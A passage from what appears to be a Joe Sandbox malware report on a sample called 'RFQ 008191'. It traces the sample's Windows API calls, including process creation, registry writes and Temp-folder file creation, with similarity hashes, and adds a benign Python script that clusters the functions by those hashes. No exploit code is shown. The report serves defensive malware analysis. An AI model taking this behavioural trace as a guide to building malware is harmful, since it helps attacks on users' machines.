• Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
• Instruction ID: 8594309fab6a939f8579025671b20e25c27ad2f20b93bd04310bc8f9388019e2
• Opcode Fuzzy Hash: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
• Instruction Fuzzy Hash: A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
• Instruction ID: 804367245b599a5d262e6525417658d62bb0317a144133a249ff79fbb491f744
• Opcode Fuzzy Hash: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
• Instruction Fuzzy Hash: 04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45
APIs
• GlobalFree.KERNEL32(00000000), ref: 00401C30
• GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
Strings
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID: Global$AllocFree
• String ID: 32079
• API String ID: 3394109436-2447952077
• Opcode ID: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
• Instruction ID: b885d26f68b874ad9ff9a305e80acb85bda866dca5011e4f065ba1a91b1516cf
• Opcode Fuzzy Hash: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
• Instruction Fuzzy Hash: 09218473904610ABD730ABA4DE85A6E72A4AB04328715053FF952B32D4C6BCE8919B5D
APIs
• lstrlenW.KERNEL32(0040B5C8,00000023,00000011,00000002), ref: 004024FA
• RegSetValueExW.ADVAPI32(?,?,?,?,0040B5C8,00000000,00000011,00000002), ref: 0040253A
• RegCloseKey.ADVAPI32(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 00402622
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID: CloseValuelstrlen
• String ID:
• API String ID: 2655323295-0
• Opcode ID: 833edd450bf946c24d3a3f94cfbbaf1e2376c793e7492529022bf014ff981997
• Instruction ID: 8b3a83999d63c16b18a9973427bcf430ab7992b94c8fe07ed2dd95b358db5eaa
• Opcode Fuzzy Hash: 833edd450bf946c24d3a3f94cfbbaf1e2376c793e7492529022bf014ff981997
• Instruction Fuzzy Hash: 1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
• Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
• Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
• Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
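The six entries above with an empty API list carry Instruction Fuzzy Hash values that differ only in a handful of hex digits, while the three entries that call GlobalAlloc/GlobalFree, RegSetValueExW/RegCloseKey and MulDiv/SendMessageW look nothing like them. That pattern (several near-identical functions next to a few unique ones) is what an analyst uses to decide which functions to read first and which to triage as copies. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it scores the nine hashes listed above against each other and groups them by single-linkage. The hashes are copied verbatim from the entries above and keyed by the first eight hex digits of each entry's Opcode ID; because Joe Sandbox does not document how the hash is built, scoring it as a positional hex string (fraction of digits that agree) and the 0.75 grouping threshold are assumptions of this example, not properties of the report.

```python
"""Group the functions listed above by their "Instruction Fuzzy Hash".

Added example; not part of the Joe Sandbox report or its IDA plugin.
ASSUMPTION: the hash is compared as a positional hex string (nibble-wise
agreement), and 0.75 is an arbitrary grouping threshold, neither of which is
documented by Joe Sandbox.
"""
from typing import Dict, List, Tuple

# Constructed input: the nine hashes copied from the entries above, keyed by
# the first eight hex digits of each entry's Opcode ID.
FUZZY_HASHES: Dict[str, str] = {
    "0bdb7e84": "C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45",
    "be7a598e": "8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45",
    "32d59b20": "F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45",
    "5ad3ccd1": "04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45",
    "702cc366": "A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45",
    "97fac772": "04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45",
    "447f2160": "09218473904610ABD730ABA4DE85A6E72A4AB04328715053FF952B32D4C6BCE8919B5D",  # GlobalFree/GlobalAlloc
    "833edd45": "1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668",  # RegSetValueExW/RegCloseKey
    "24120cd7": "9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C",  # MulDiv/SendMessageW
}


def similarity(a: str, b: str) -> float:
    """Fraction of positions at which two hex strings agree (case-insensitive).

    Strings of unequal length are scored over the longer length, so a missing
    tail counts as mismatches instead of being silently ignored.
    """
    a, b = a.upper(), b.upper()
    longest = max(len(a), len(b))
    if longest == 0:
        return 1.0
    matches = sum(1 for x, y in zip(a, b) if x == y)
    return matches / longest


def cluster(hashes: Dict[str, str], threshold: float = 0.75) -> List[List[str]]:
    """Single-linkage grouping with union-find: two functions land in the same
    group if a chain of pairwise similarities >= threshold connects them."""
    names = list(hashes)
    parent = {n: n for n in names}

    def find(x: str) -> str:
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    for i, a in enumerate(names):
        for b in names[i + 1:]:
            if similarity(hashes[a], hashes[b]) >= threshold:
                parent[find(a)] = find(b)

    groups: Dict[str, List[str]] = {}
    for n in names:
        groups.setdefault(find(n), []).append(n)
    # Largest group first; members and equal-sized groups in sorted order.
    return sorted((sorted(g) for g in groups.values()), key=lambda g: (-len(g), g))


def closest_pairs(hashes: Dict[str, str]) -> List[Tuple[float, str, str]]:
    """All pairs, best match first, for eyeballing where a threshold should sit."""
    names = list(hashes)
    pairs = [(similarity(hashes[a], hashes[b]), a, b)
             for i, a in enumerate(names) for b in names[i + 1:]]
    return sorted(pairs, reverse=True)


if __name__ == "__main__":
    for group in cluster(FUZZY_HASHES):
        print(len(group), group)
    for score, a, b in closest_pairs(FUZZY_HASHES)[:5]:
        print(f"{score:.3f} {a} {b}")
```

With the threshold at 0.75 the six API-less functions fall into one group and each of the three API-calling functions stands alone; the top pairwise scores are all inside the first group, and the best score between that group and any of the other three is well under 0.5, so the grouping is not sensitive to the exact threshold chosen.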
                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 004056A9
                                                                      • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                    • CoUninitialize.COMBASE(00000404,00000000), ref: 004056F5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeMessageSendUninitialize
                                                                    • String ID:
                                                                    • API String ID: 2896919175-0
                                                                    • Opcode ID: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                                    • Instruction ID: b888f1dcde8397bdf9a4ac710541df7d57aeeece4d3a8f29a6716c55d94af5f1
                                                                    • Opcode Fuzzy Hash: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                                    • Instruction Fuzzy Hash: 0AF0B4776007409BE7115B54AE05B5B77B0EB90354F85483AEF8D726F1C7764C028B5D
                                                                    APIs
                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Window$EnableShow
                                                                    • String ID:
                                                                    • API String ID: 1136574915-0
                                                                    • Opcode ID: f524000984b40da921d67aceb392e6b1a27f4445b9fdd89c88039cce022366aa
                                                                    • Instruction ID: cc057469d20fee5af05168c8280afa7b014ceb16d0f4b1b408cb009327ac905f
                                                                    • Opcode Fuzzy Hash: f524000984b40da921d67aceb392e6b1a27f4445b9fdd89c88039cce022366aa
                                                                    • Instruction Fuzzy Hash: 7BE04876908610DFE754EBA4AE495EE73B4EF80365B10097FE001F11D1D7B94D00975D
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                    • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID:
                                                                    • API String ID: 3712363035-0
                                                                    • Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                    • Instruction ID: 3e6b85693243cf5959e47e0a5ce0ecee53803ede082a99688cf67a66356fc275
                                                                    • Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                    • Instruction Fuzzy Hash: 3AE0BFB4A10219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551D774A9148A7C
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                                                    • Instruction ID: ad827bfb45cde9ed8aa1bf7c1acfcc20c377366860c5f8f00bfddef7402fec92
                                                                    • Opcode Fuzzy Hash: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                                                    • Instruction Fuzzy Hash: 52E04F72B11114ABCB18CBA8EDD086E73B6AB54310350453FD502B36A4CA759C418B58
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                      • Part of subcall function 004068C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                                      • Part of subcall function 004068C5: wsprintfW.USER32 ref: 00406917
                                                                      • Part of subcall function 004068C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2547128583-0
                                                                    • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                    • Instruction ID: 5f896a6f513cb693e05c26686958cbb9026995673407ad46a654cc37c4de4e39
                                                                    • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                    • Instruction Fuzzy Hash: BCE0CD73604310EBD61067755D0493773E89F85B50302483EF947F2140D734DC32A7AA
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: File$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 415043291-0
                                                                    • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                    • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                    • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                    • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,?,00405C11,?,?,00000000,00405DE7,?,?,?,?), ref: 00406011
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406025
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                    • Instruction ID: fbd6844141adfc982ff7d741096df028d7bbee698e850df9006aa2ae5f51d9dd
                                                                    • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                    • Instruction Fuzzy Hash: 24D0C972504221AFC2103728EE0889BBF55DB542717028A35F8A9A22B0CB304C668694
                                                                    APIs
                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                                    • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B03
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1375471231-0
                                                                    • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                    • Instruction ID: c3646108da72950d5b730f2af08982bf7448ccd78712563759f5c9f930c8cbe9
                                                                    • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                    • Instruction Fuzzy Hash: 11C04C70244906DAD6509B219F0C71779A0EB50781F195839A586E50A0DA34B455D92D
                                                                    APIs
                                                                    • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406405
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040349F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060F7
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034D1,00000000,00000000,00403328,000000FF,00000004,00000000,00000000,00000000), ref: 004060C8
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034E2
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
• SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• KiUserCallbackDispatcher.NTDLL(?,004042B9), ref: 004044EC
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
  • Part of subcall function 004055C6: lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
  • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
  • Part of subcall function 004055C6: lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
  • Part of subcall function 004055C6: SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
  • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
  • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
  • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
  • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
  • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
  • Part of subcall function 004069E0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069F1
  • Part of subcall function 004069E0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A13
  • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
Memory Dump Source
• Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2972824698-0
                                                                    • Opcode ID: 1c7c1930723d4ccd5ae5bb4616c40caea24dbe794e3428a6cec7ded8fab62b7a
                                                                    • Instruction ID: 2b527fce213089fa12a92f7baeb69a5519dacc7bd52e038cdd259e112745fe09
                                                                    • Opcode Fuzzy Hash: 1c7c1930723d4ccd5ae5bb4616c40caea24dbe794e3428a6cec7ded8fab62b7a
                                                                    • Instruction Fuzzy Hash: D0F09632904611ABDF30BBA59A895DF76B49F0035CF21413FE202B25D5C6BD4E41E76E
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404A00
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404A2A
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404AE6
                                                                    • lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404B18
                                                                    • lstrcatW.KERNEL32(?,: Completed), ref: 00404B24
                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36
                                                                      • Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98
